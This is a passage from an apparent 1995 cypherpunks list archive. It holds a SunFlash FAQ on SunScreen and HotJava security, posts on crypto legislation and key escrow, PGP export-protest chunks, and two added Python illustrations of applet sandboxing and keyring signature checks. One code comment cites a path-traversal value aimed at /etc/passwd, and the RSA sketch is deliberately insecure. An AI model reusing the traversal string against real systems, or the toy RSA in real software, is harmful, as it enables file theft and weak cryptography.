only due to its stealth design and integrated encryption technology,
but also because it includes services which makes it a truly complete
security solution. Other security products on the market today are
either implemented only in software, lack encryption capabilities or
are run layered on top of existing, multi purpose operating systems.
Currently popular security products include Eagle/Raptor, TIS Gauntlet,
CheckPoint FireWall-1, DEC SEAL, ANS Interlock and Livingston
Enterprises Firewall IRX.

Who are likely customers for SunScreen ?

SunScreen is targeted at commercial, enterprise, highly networked
customers.  Commercial enterprises which are critically dependent on
networks for their business functioning are the primary candidates for
this product. Such customers include telecommunications companies,
financial institutions, health care organizations and the Government.

How does SunScreen differ from FireWall-1 ?

SunScreen can be regarded as a functional superset of FireWall-1. It
is a highly sophisticated network security solution targeted at
complex, commercial networks. FireWall-1 restricts its operation to
packet screening. SunScreen provides support for message
encryption/decryption. In addition, SunScreen is invisible from the
network, rendering it more difficult to detect and invade; SunScreen
SPF-100 can only interface to a qualified Administration Station using
an encrypted link, making it very difficult to probe or to modify the
operating environment. SunScreen provides a higher level of security at
a higher price. Users need to evaluate their security needs. FireWall-1
may provide adequate security for the basic security needs of
a corporation.

What restriction does the US Government impose on using cryptographic
methods available with SunScreen?

All modes of encryption included with SunScreen are permitted for all
transactions within the U.S.A. and Canada. Shipping encryption
products including DES, 1024 bit Diffie-Hellman, and 1024 bit RSA
outside the U.S.A. and Canada requires an export license. An export
license for the use of an encryption product by a foreign based entity
controlled by a U.S.A. company has a strong prospect for approval.

What special security issues does interaction with the WWW present?

Communication with the WWW and other Internet services such as Archie
and Gopher present no special problem for SunScreen security. Packet
screens can easily be configured to regulate traffic from/to these
services using standard Administration Station tools.

Is there any kind of security certification for this class of product?

Typically, security classification such as B1, C2, etc. issued by the
NSA, entails certification of a complete operation environment,
including hardware, OS, applications, etc. Sun has designed the product
to be independent of a multi purpose operating system. The embedded OS
included in the SPF-100 has been stripped of all network services,
user programs, etc. and can be used only for executing the SunScreen
software. However, with the recognition that some sort of security
classification will be required for SunScreen, Sun is working with the
proper authorities to define appropriate classifications for this new
class of security.

------------------------------------------------------------------------------

HotJava Security Answers

First some bulk information on Java security, there are three concepts
here and you have to keep them separate: Safety, Security, and Trust.
They apply to both the language itself (Java) and the browser written
in the language (HotJava).

Java - Security Within The Language:

Safety:

The Java language is safe because the language has no intrinsic
semantics for modifying the trusted computing base. In simple terms
this means that there is no way for pure Java code to modify its own
stack, write on memory it hasn't allocated, or execute methods (invoke
functions) it wasn't explicitly given access to. The mechanisms used
to create this safety are the language design (no semantics), the
virtual machine design (sufficient semantic information is retained in
a 'binary' to verify that the language imposed limits are not
violated), and un-forgeable pointers (no casting). Further memory
reclamation is done by a garbage collector which eliminates hanging
pointer problems. Array indexing and pointer casting is checked at
runtime for validity.

Security:

The Java language is secure because, as an object oriented language the
only way to do anything is to invoke a method on a class, and the only
way to instantiate a class is with the 'new' operator. This operator is
tied into a system class of type ClassLoader which enforces arbitrary
security policies on classes that it loads. Class loaders are thus the
arbiters of the capabilities granted a class they have instantiated.

Trust:

The Java language will supply a class loader capable of verifying a
digital signature on a class prior to loading that class. This allows
different capabilities to be assigned to classes of differing origin.
Further, classes will be able to query the class loader for this
information and thus be able to determine if they are being called by a
trusted class. (this is required to export cryptography in the Java
runtime, the crypto classes have to know who is calling them so as to
enforce US mandated restrictions on their operation.)

HotJava - Security Within The Browser:

Safety:

Safety in the HotJava browser revolves around primarily the control of
applets.  Applets are loaded using an anal class loader called the
NetClassLoader. This class loader can control access to system
services. Further the implementation of certain classes (such as File)
recognize when they are being invoked from a class that was loaded from
the network class loader and they enforce additional restrictions. For
example, applets can only open files in two directories on UNIX
systems: /tmp/hotjava and ~/.hotjava (this can be modified with the
READPATH and WRITEPATH environment var's). Further when files are
accessed in these directories a confirmation is raised in the form of a
dialog with the user. There is no way for an applet to get around this
restriction. To open a file it _has_ to use the File class, the network
class loader won't allow it to load a new version of the File class,
and the file class has to have some bound in C code to do its work and
the applet can't bring over its own native code.  It's stuck.

Security:

The browser keeps track of what the applets are doing. Under some
conditions it modifies the capabilities available to an applet after
certain events. For example, the network class loader keeps track of
whether or not the applet came from "within" the firewall (direct
access to host) or "outside" the firewall (through the firewall). It
also keeps track of any files or sockets the applet opens. If the
applet opens any socket or file that is bound "inside" the firewall
(any file, and host inside the firewall) it is prevented from ever
opening a connection to a host "outside" the firewall.

Trust:

The browser is "trusted" code, and the source is available to assist in
developing trust of the code. Further it will be possible to sign all
valid browser classes (package browser.*) with a browser key,
preventing from any subversion of the browser after it has reached
trusted status. (I envision it working something like: Certify the
browser through inspection or what ever, build the classes, sign the
classes, invoke the browser with the public key of the signature.
Destroy the secret key.)
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Press announcements and other information about Sun Microsystems are
available on the Internet via the World Wide Web. URL http://www.sun.com

SunFlash - A Full-Text On Demand Newsletter for Users of Sun Computers

John J. McLaughlin - Publisher & Editor   - flash@FlashBack.COM 
Tim Wells          - Associate Editor     - tim@FlashBack.COM 
Mark Wood	   - Distribution Manager - flashadm@FlashBack.COM

Subscriptions to       majordomo@FlashBack.COM 
Article Requests to    flashback@FlashBack.COM 
Article Submissions to flash@FlashBack.COM 

For more information send email to flashback@FlashBack.COM with article
names or numbers in the Subject line:
	9001       - general introduction 
	index      - for an index of the most recent 150 articles
	fullindex  - for an index of 800+ articles
	popular    - for a summary of the popular article for each month
	73.00 1176 - For the January  1995 Table of Contents 
	74.00	   - For the February 1995 Table of Contents
	75.00 1221 - For the March    1995 Table of Contents
	76.00 1262 - For the April    1995 Table of Contents
	77.00 1286 - For the May      1995 Table of Contents
	78.00 1344 - For the June     1995 Table of Contents
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
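
The applet restrictions described under "HotJava - Security Within The Browser" can be modelled as a small reference monitor. The Python below is an added illustration, not HotJava code or part of the SunFlash text; the inside address range, the home directory and all class and function names are assumptions.

```python
import ipaddress
import posixpath

# Assumptions (not from the page): the address range treated as "inside"
# the firewall and the user's home directory.
INSIDE_NETS = [ipaddress.ip_network("10.0.0.0/8")]
HOME = "/home/alice"
ALLOWED_DIRS = ["/tmp/hotjava", HOME + "/.hotjava"]


class PolicyViolation(Exception):
    """An applet request was refused."""


def is_inside(addr):
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in INSIDE_NETS)


def path_allowed(path):
    # Normalise before comparing, so "/tmp/hotjava/../../etc/passwd" is
    # judged by where it really points. A production check would also
    # resolve symlinks on the live filesystem.
    if path.startswith("~/"):
        path = HOME + path[1:]
    norm = posixpath.normpath(path)
    return any(norm == d or norm.startswith(d + "/") for d in ALLOWED_DIRS)


class AppletMonitor:
    def __init__(self, origin_addr, confirm=lambda path: True):
        # Origin is recorded as the text describes; the text does not say
        # how it changes the rules, so this model does not act on it.
        self.from_inside = is_inside(origin_addr)
        self.touched_inside = False  # sticky flag, never reset
        self.confirm = confirm       # stands in for the user dialog
        self.log = []

    def open_file(self, path):
        if not path_allowed(path):
            self._deny("file", path, "outside the permitted directories")
        if not self.confirm(path):
            self._deny("file", path, "user declined")
        self.touched_inside = True   # "any file" counts as inside
        self.log.append(("allow", "file", path))

    def connect(self, addr):
        inside = is_inside(addr)
        if not inside and self.touched_inside:
            self._deny("socket", addr, "applet already touched inside data")
        if inside:
            self.touched_inside = True
        self.log.append(("allow", "socket", addr))

    def _deny(self, kind, target, reason):
        self.log.append(("deny", kind, target))
        raise PolicyViolation(f"{kind} {target}: {reason}")


def replay(origin, ops):
    """Apply (kind, target) requests in order; return allow/deny per request."""
    mon = AppletMonitor(origin)
    out = []
    for kind, target in ops:
        try:
            (mon.open_file if kind == "file" else mon.connect)(target)
            out.append("allow")
        except PolicyViolation:
            out.append("deny")
    return out


if __name__ == "__main__":
    # Constructed request sequence: outside host, local file, outside host again.
    print(replay("192.0.2.10", [("socket", "192.0.2.10"),
                                ("file", "/tmp/hotjava/cache.dat"),
                                ("socket", "192.0.2.10")]))
```

A refused request does not set the sticky flag, so an applet whose file open was denied can still reach outside hosts.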




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering        <pgf@tyrell.net>
Date: Thu, 13 Jul 95 17:01:03 PDT
To: ylo@cs.hut.fi
Subject: Crisis Overload (re Electronic Racketeering)
In-Reply-To: <199507132215.BAA17628@shadows.cs.hut.fi>
Message-ID: <199507132356.AA13388@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain


   Date: Fri, 14 Jul 1995 01:15:04 +0300
   From: Tatu Ylonen <ylo@cs.hut.fi>
   to break encryption for anyone.  Plus, it was created and is primarily
   distributed *outside* the United States, in a country where none of
   the algorithms are patented.  It can thus be openly available for

Well, I think it's nice that people outside the U.S. will have access
to encryption; it appears, however, that those of us in the U.S. writing
such software may end up having to forego payment and credit, until
Blacknet is very strong...

Phil




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Thu, 13 Jul 95 16:01:40 PDT
To: cypherpunks@toad.com
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
Message-ID: <199507132259.SAA03339@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199507132116.VAA149322@smtp-gw01.ny.us.ibm.net>,
jfmesq@ibm.net (James F. Marshall) wrote:

> I haven't read the whole
>bill, but I read the "regardless" phrase with a different emphasis. 
>In short, that language appears to mean that one could be pounded with
>RICO for uploading crypto software even if the crypto is EXPORTABLE.

The government doesn't want us to use any crypto that takes them an
appreciable amount of time to crack. It seems inevitable to me that such
crypto will soon be outlawed. The same goes for anonymous remailers. It is
only a matter of (very little) time. Yes, Black Unicorn is right. We need
stealth encryption. Unfortunately even that won't help as much as one
might think, because it can only be used by tight conspirators who are
willing to take the risk to be locked up in a concentration camp, I
mean jail, for the rest of their lives. Crypto for the masses is about to
fade away into history, before it ever really caught on.

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMAWlEyoZzwIn1bdtAQFIYwF+JKboVVw7qm+Ejyj0ecTp1EbqWL2YCAlb
tL3RLDWA5VLcKakMh2nI3oZns0SLknGw
=+fvE
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Thu, 13 Jul 95 16:50:58 PDT
To: cypherpunks@toad.com
Subject: Re: mistake on my part
Message-ID: <199507132348.TAA03865@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <9507131759.AA12314@webster.imsi.com>, perry@imsi.com (Perry E.
Metzger) wrote:

>I made a small mistake -- the new bill does *not* make it a crime to
>make crypto software available at Egghead -- but it does more or less
>make distribution of crypto software over the internet impossible if
>it isn't an escrow based system.

And once that happens, you will have to fill out a form and register your
copy of crypto software that you got at Egghead, just as you have to
register firearms today.

<I am starting to wish I had bought an AR-15 back when you still could>

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMAWwryoZzwIn1bdtAQG9nAF/WVEXYjXk8fmPHtgn0pxfMTMBLCjAEvM0
+XKCLWWTaQ/5jy3cvFco8FILAb48RuYz
=+LO3
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Thu, 13 Jul 95 11:50:59 PDT
To: perry@imsi.com (Perry E. Metzger)
Subject: mistake on my part
Message-ID: <22250.9507131850@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Perry Metzger <perry@imsi.com> writes on cpunks:
> I made a small mistake -- the new bill does *not* make it a crime to
> make crypto software available at Egghead -- but it does more or
> less make distribution of crypto software over the internet
> impossible if it isn't an escrow based system.

I thought there was some kind of "read my lips" type statement about
not mandating key escrow a short while ago.  Making it illegal to not
use escrow on the internet (in the US and certain materials) sounds
dangerously close to mandating key escrow.

Also I remember one list member making a prediction, that as they'd
said _definitely no key escrow_, that you could bet your ass that
meant exactly the opposite, and that it would rear its head anytime
soon.  I think the poster even had a prediction in terms of months,
but don't have the original post handy, looks like he was right.

Anyway these things are in stages:

1. voluntary key escrow
2. mandatory key escrow for certain materials
3. mandatory key escrow across the board

If they pull this off stage 2, I wonder how long till stage 3, I think
it'll be time to leave the sinking ship while exit visas are still
granted!

Adam
--
------------------ PGP.ZIP Part [025/713] -------------------
M83PL=@FR8ES%:6Q"(F9A#)K!&_;X4TXZ?(T]6(]`>$*.^]3K*K["(239)\@F
MHA\"<%"5(%N->/2!'>X3XPU<0!Y,F``58RK(F;K#XD2,^`F[L09CT1>MH,7/
MC@FR+[`#J_`.6J`QW&"'YPZ4A[,XC10,0@\T1R.H\52,%3N1CI\TY('#M1)D
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Thu, 13 Jul 95 16:54:39 PDT
To: cypherpunks@toad.com
Subject: Re: mistake on my part
Message-ID: <199507132352.TAA03917@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article
<Pine.ULT.3.91.950713143343.10146B-100000@krypton.mankato.msus.edu>,
hayden@krypton.mankato.msus.edu ("Robert A. Hayden") wrote:

>On Thu, 13 Jul 1995 aba@dcs.exeter.ac.uk wrote:
>
>> If they pull this off stage 2, I wonder how long till stage 3, I think
>> it'll be time to leave the sinking ship while exit visas are still
>> granted!
>
>And go where?  I know I'm living in a shell, but I've never heard a 
>definitive answer of where is a better place to live and still has the 
>same or better freedoms.
>
>*serious question*

There is none. At least not for the average citizen with an average
income. This is the best you will find. Everywhere else it is already
worse than here and getting worse as well. Perhaps nanotech will have a
breakthrough and allow colonization of outer space. There sure is nothing
on this planet. Sorry.

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMAWxbioZzwIn1bdtAQE1GwF+PshiXqSvW6H3hpGks8Z+6PqdR2wEeWbC
1TUfjgzcGKVl3vFc1SZWTr2VitCPJb0q
=1xuY
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Thu, 13 Jul 95 17:07:57 PDT
To: cypherpunks@toad.com
Subject: Re: The end of public key cryptography as we know it?
Message-ID: <199507140005.UAA04037@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199507132009.AA15283@tyrell.net>, pgf@tyrell.net (Phil
Fraering       ) wrote:

>   From: Doug Hughes <Doug.Hughes@eng.auburn.edu>
>   Date: Thu, 13 Jul 1995 13:46:10 -0500
>
>   An article posted on sci.crypt stated that quantum factoring
>   is real and that an article was posted in this month's Science
>   magazine. The author of the post says this would make factoring
>   a 10 bit number the same time as factoring a 100000000 bit number.
>
>You can bet your ass and your mother's and grandmother's donatable
>organs that if this were possible, then the legislative initiatives
>currently underway would not be: they'd just let us use RSA and get
>a false sense of security.

Even with a quantum computer, factoring is still an extra step that is not
required with GAK. Besides, factoring will always be more expensive than
GAK, at least for the other side.

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMAW0VSoZzwIn1bdtAQG9QQF+OWci7VK8X9/ropNlf5dGW5/jbHWo+4cR
2GvuYpDvoAbDRQmDcpFR7u8hBog7KIet
=c/wa
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Thu, 13 Jul 95 18:10:17 PDT
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: Expansion on my earlier rant (long)
Message-ID: <Pine.ULT.3.91.950713200640.19067A-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hi all, me again.

I've received about a dozen requests to clarify my rant earlier about 
what I think needs to be done about the future of the CPs and the net, 
now that the official declaration of war has been made by the government. 
So, I'm going to do that.  

As a quick warning, however, I need to remind everyone that I am not a 
programmer.  My knowledge of Internet protocols is passable, but actual 
implementation issues are beyond me.  Basically, I'm a well-informed user 
with dreams.  Professionally, I'm a teacher and a graduate student in the 
area of Education Technology (use of modern technologies as applied to 
education) at Mankato State University in Minnesota.  I also write geek 
codes and am active politically serving on the college senate and being 
outspoken in other areas. :-)

Anyways . . . 

- -------------

When I look at the current political climate, the current technologies, 
and the predictions for the next two or three years of the expected 
changes in the social makeup to the Internet, I quickly realize that the 
Cypherpunks cannot possibly, except by pure luck, expect to influence any 
change of the net.  The problem isn't that it is growing too fast.  The 
problem is that we as a generation of network users, who first came 
online circa 85-92, are not the same generation that make up the bulk of 
the population.

The bulk of the population, and the one that is continuing to come 
online, don't CARE about technical issues.  All they care about is what 
the net can do for them as a COMMUNICATION TOOL.  And until WE stop 
getting bogged in technical issues and start looking at this from the 
user's end of the spectrum, not enough people are going to care for it to 
matter. 

So when you take a program like PGP, which by all definitions is a
technological godsend, and introduce it to the mass populations of the
net, you get a big "Buh!?" back from them.  Why?  Because they just don't
care.  Furthermore, it becomes difficult to teach them about the values
of the program because PGP is far too difficult to use.  I'm not saying
that the majority of the net is stupid, just that they don't want things
to be any more complicated than necessary. 

Thus, if we want to institute change, we have to come at it from a 
different angle.  We have to take into consideration the sociological 
makeup of the net, and, more importantly, what the current and future 
populations of the net are going to WANT.  Serving the needs of a tiny
percentage of people isn't going to accomplish what we want.

- -------
WHAT SHOULD WE DO

Now, if I was the king, this is what I'd like to see done...

1)	RE-EVALUATE PUSHING PGP
There is little doubt that PGP is a great program.  It does everything we 
want it to do.  Unfortunately, there are some significant problems with 
it as well.
	A)  ITAR:  'nuff said.  This prevents its global use.
	B)  Patent concerns.  I don't know fully the details of this, but 
		if I understand, there are some concerns about who owns 
		what portions of the encryption algorithms, or something to
		that effect.
	C)  Can PGP's features be implemented in a style usable by the
		current generation of Internet users?

The problem is that while we fight solving all of these concerns, we are 
going nowhere.  Would it be, in terms of time required, better to come 
up with another system that solves these problems?  By using 
international encryption techniques and Public Domain algorithms, and 
design the program specifically for implementation in user-end and 
server-end programs?

I don't know.  But this is what the re-evaluation needs to answer.

2)	PUSH FOR UNIVERSAL DIGITAL SIGNATURES
In my version of utopia, all digital messages are signed.  Unfortunately, 
right now, there are no mechanisms in place to achieve that.  

	First, a way to get signatures out needs to be done.  A
	server<->client program similar to Archie needs to be developed
	that will allow people to retrieve signatures off of some registry
	site(s).  Of course, this should be done with encryption, probably
	something similar to what netscape uses for its data transfers.  I
	should be able to get any person's digital signature knowing
	nothing more than their email address, or less specific, their
	name.  This is a white pages of the net. 

	Second.  A mechanism needs to be devised where all email and
	usenet material is digitally signed.  This needs to be done in a
	way that the user is not even aware that it is being done.  Perhaps
	an encrypted environment variable containing the key would work
	(ie, you run a program, type in your passphrase, it encrypts it to 
	a file, assigns your signature, and then reads that file into the
	environment, decrypting it when needed.  It does this once during 
	generation.).  In any case, no user should have to manually sign 
	anything.  Optimally, signatures would be part of the header of the 
	message, and not even seen by users. It's not 100% safe, especially
	on a multi-user system, but it's a helluva start. 

	Third, automated checking, via news readers or mail readers needs
	to be implemented.  All it needs to do is when a message arrives,
	it first greps the users personal keyring.  If the matching
	signature isn't found, it checks the system keyring.  If not
	found, it uses a similar protocol as above to check the Global
	Keyring (using an encrypted session).  If the signature is found to
	be authentic, it marks it as such, if not, it warns the user and
	it is unreliable data.  This optimally would take place prior to
	delivery by the mail transfer agent or news transfer agent of the
	receiving computer. 

No matter what, digital signatures need to be pushed as being unrelated 
to cryptography.  While they are similar, there are political problems 
with encryption, but not really with signatures.  If we make a hearty 
push towards authenticated communications, encryption falls right in line 
as a (oh, by the way, we can also...)

3)	NEAR TRANSPARENT ENCRYPTION

In the end, the goal is that encryption becomes simple enough and 
unintrusive enough that everybody will use it.  Once again, however, we 
need public key servers that can dole out keys on request.  Furthermore, 
encryption needs to be as simple as clicking on a button when you mail 
it, with the mail program or transfer agent doing the appropriate 
scrambling based on the addressee.  It needs to be able to get keys from 
servers in the background and decrypt without any more manual interaction 
than typing in a passphrase.  It is also my belief that digital 
signatures and encryption SHOULD NOT utilize the same key in a fully 
automated system, or have different passphrases within the same key.

4)	AND IT'S ALL GOTTA BE SIMPLE
Finally, I need to reiterate this.  Whatever is implemented has to be 
ungodly simple to use.  Users shouldn't have to think about this stuff.  
Administrators shouldn't have to deal with user requests about this stuff 
(just install the programs and go to it).  It's all gotta be free, AND 
internationally legal.  If we fail any of these tests, we can't win.

5)	JOIN THE EFF
Well, I just thought I'd throw this in, it can't hurt :-)

- ----------------------

Anyway, that's what I see as needing to be done.  All of this ISN'T just
about writing code, however.  All of us, myself included, need to start
electronically signing everything we send, especially to mailing lists and
as much as you can to usenet.  If anything, it gets the word out as a
USEFUL implementation of this technology (verification of message).  We
need to not be afraid to send a letter to our elected officials warning
them about what the laws they are passing are going to do.  That's the
easy part.  The hard part is staying at it long enough to win the war. 

[as a side note, does anybody have a script or program that will 
auto-sign a message?  I'm using mkpgp for pine right now as an alternate 
editor, but that does more than I need (encryption and such).]



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----


____        Robert A. Hayden      <=> Cthulhu Matata
\  /__          -=-=-=-=-         <=>          -=-=-=-=-
 \/  /  Finger for Geek Code Info <=> hayden@krypton.mankato.msus.edu
   \/   Finger for PGP Public Key <=> http://att2.cs.mankato.msus.edu/~hayden
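
The three-step lookup proposed in the message above (personal keyring, then system keyring, then a global registry), sketched in Python. This is an added example, not code from the post; the signature scheme is textbook RSA over fixed primes, constructed only so the sketch runs without libraries and not secure, and all names and addresses are assumptions.

```python
import hashlib
from collections import namedtuple

E = 65537  # public exponent


def toy_keypair(p, q):
    """Textbook RSA from two fixed primes. Constructed for the demo, NOT secure."""
    n, phi = p * q, (p - 1) * (q - 1)
    return (n, E), (n, pow(E, -1, phi))


def _digest(message, n):
    return int.from_bytes(hashlib.sha256(message).digest(), "big") % n


def sign(message, priv):
    n, d = priv
    return pow(_digest(message, n), d, n)


def verify(message, sig, pub):
    n, e = pub
    return pow(sig, e, n) == _digest(message, n)


Verdict = namedtuple("Verdict", "status source")


def check_message(sender, message, sig, keyrings):
    """keyrings is an ordered list of (name, {address: public_key}).

    The first keyring that knows the sender decides the verdict; later
    keyrings are not consulted. The keyring name is returned so a mail
    reader can show how much local trust stands behind the key.
    """
    for name, ring in keyrings:
        pub = ring.get(sender)
        if pub is None:
            continue
        status = "authentic" if verify(message, sig, pub) else "BAD SIGNATURE"
        return Verdict(status, name)
    return Verdict("unknown signer", None)


def demo():
    # Constructed keys (Mersenne primes) and constructed addresses.
    alice_pub, alice_priv = toy_keypair(2**61 - 1, 2**89 - 1)
    bob_pub, bob_priv = toy_keypair(2**107 - 1, 2**127 - 1)
    carol_pub, carol_priv = toy_keypair(2**89 - 1, 2**127 - 1)
    other_pub, other_priv = toy_keypair(2**61 - 1, 2**107 - 1)
    keyrings = [
        ("personal", {"alice@example.org": alice_pub}),
        ("system", {"bob@example.org": bob_pub}),
        # The registry entry for alice disagrees with the personal keyring.
        ("global", {"alice@example.org": other_pub,
                    "carol@example.org": carol_pub}),
    ]
    msg = b"Meeting moved to Thursday."
    cases = {
        "alice, intact": ("alice@example.org", msg, sign(msg, alice_priv)),
        "alice, altered": ("alice@example.org", msg + b" Bring cash.",
                           sign(msg, alice_priv)),
        "alice, registry key": ("alice@example.org", msg, sign(msg, other_priv)),
        "bob": ("bob@example.org", msg, sign(msg, bob_priv)),
        "carol": ("carol@example.org", msg, sign(msg, carol_priv)),
        "dave": ("dave@example.org", msg, sign(msg, carol_priv)),
    }
    return {label: check_message(*args, keyrings) for label, args in cases.items()}


if __name__ == "__main__":
    for label, verdict in demo().items():
        print(f"{label:22} {verdict.status:15} {verdict.source}")
```

Because the locally held key wins, a message signed with the conflicting registry key for alice is reported as a bad signature rather than accepted, and "unknown signer" stays distinct from a failed check.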




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Thu, 13 Jul 95 17:35:40 PDT
To: cypherpunks@toad.com
Subject: Crypto '95 roommate?
Message-ID: <199507140035.UAA23513@toxicwaste.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


Anyone looking for a roommate for crypto '95?  If so, let me know.

-derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: unicorn@polaris.mindport.net (Black Unicorn)
Date: Thu, 13 Jul 95 20:03:20 PDT
To: perry@imsi.com
Subject: Re: Fight, or Roll Over?
Message-ID: <v02130500ac2ce4f7153e@[205.219.167.38]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 9:55 PM 7/13/95, Perry E. Metzger wrote:
>"Robert A. Hayden" writes:
>> On Thu, 13 Jul 1995, Douglas Barnes wrote:
>>
>> > Since the Anti-Electronic Racketeering Act of 1995 might as well
>> > be called the "Anti-Cypherpunk Act of 1995", I'm surprised to see
>> > Tim throw in the towel already, when the bill hasn't even made it
>> > through committee yet.
>>
>> I don't think Tim threw in the towel on this bill, but has come to
>> realize that the overall war on privacy cannot be won by concentrating on
>> the individual battles.
>
>That's true. However, I think that one strategic move would be to get a
>PR firm involved that is capable of severely embarrassing any politico
>who puts his name on any of these proposals. After two or three of those
>they start getting gun-shy.
>
>Folks, this isn't trivial. It isn't an easy thing to do by any
>means. However, it is far from impossible.
>

[...]

>
>Anyone who is saying that it is impossible to fight the legislative
>battles hasn't been thinking. It takes millions of dollars,  but there
>is a lot of money out there to be had in my opinion.

Perry and I discussed this a bit today.  I have a call into a friend of mine
at one of the larger firms in D.C., who I will neglect to name until I hear
back.  I have a feeling there are a pile of funds to be had, and I'm going to
try to work with Perry to get the people who should be interested,
interested.


>
>Perry

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: merriman@arn.net (David K. Merriman)
Date: Thu, 13 Jul 95 18:44:26 PDT
To: cypherpunks@toad.com
Subject: Root Causes
Message-ID: <199507140151.UAA01504@arnet.arn.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

While I respect the ideas and opinions submitted by the majority of the
members of this list, I wonder if perhaps we're failing to deal with the
_root_ problem of such things as the CDA, Clipper, DTA, etc.

Specifically, I wonder if it wouldn't be a better approach to *prevent* such
measures from ever being proposed in the first place.

(pause to adjust nomex undies and titanium body armor :-)

Is there any precedent or possibility of either filing civil or criminal
charges against a Government official for their _official_ actions?
Something that will not only make for some Serious Press, but hit them from
an unexpected angle?

(close hatch on bunker :-)

It would seem that things such as the CDA, etc, are patent violations of the
Bill of Rights. As such, wouldn't the Congressrodent(s) proposing such
measures be violating our civil rights, and thus be criminally liable?
Aren't Congressrodents supposed to take an Oath of Office that involves
upholding the Constitution?

Alternatively, could a civil suit be filed for invasion of privacy or
somesuch? Or perhaps the previously mentioned violation of civil rights (a
la Rodney King)?

How many laws, etc, can we invoke? I mean, most congresscritters don't craft
laws on their own, so the involvement of their staff would constitute
conspiracy, as well, wouldn't it?

I'd think that if a few of the <insert favorite expletive here> were sued
and/or tried, it would sure make the rest of them consider the full
implications of any laws they might consider proposing. Too, it might
accidentally ripple through all of the Government, and settle down some of
the bureaucrats that aren't subject to voters.

IANAL, of course, so I'll leave it up to those on the list who are to
express more informed opinions; still, it _seems_ like a possible course of
action.....

Dave Merriman

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----
This is a test (3 UUE lines) of the unconstitutional ITAR - 1/713th
of the PGP executable. See below for getting YOUR chunk! 
------------------ PGP.ZIP Part [015/713] -------------------
M=$<(&L`#*IPP",(G6(,,S,`P](<2RWU96XCW86/JBYV8A\D8@X'HB_9H#&\X
MX'PCUB.,13B"X8`R?^J-:UB.M_`U\>[#)BS&5$0C,Y#^1CS>1`\T1QTXX6!3
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bob Snyder <rsnyder@janet.advsys.com>
Date: Thu, 13 Jul 95 17:55:30 PDT
To: cypherpunks@toad.com
Subject: Re: OTP server..
In-Reply-To: <v02130500ac2cc7c4390a@[205.219.167.38]>
Message-ID: <199507140053.UAA13342@janet.advsys.com>
MIME-Version: 1.0
Content-Type: application/pgp

PGP message


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
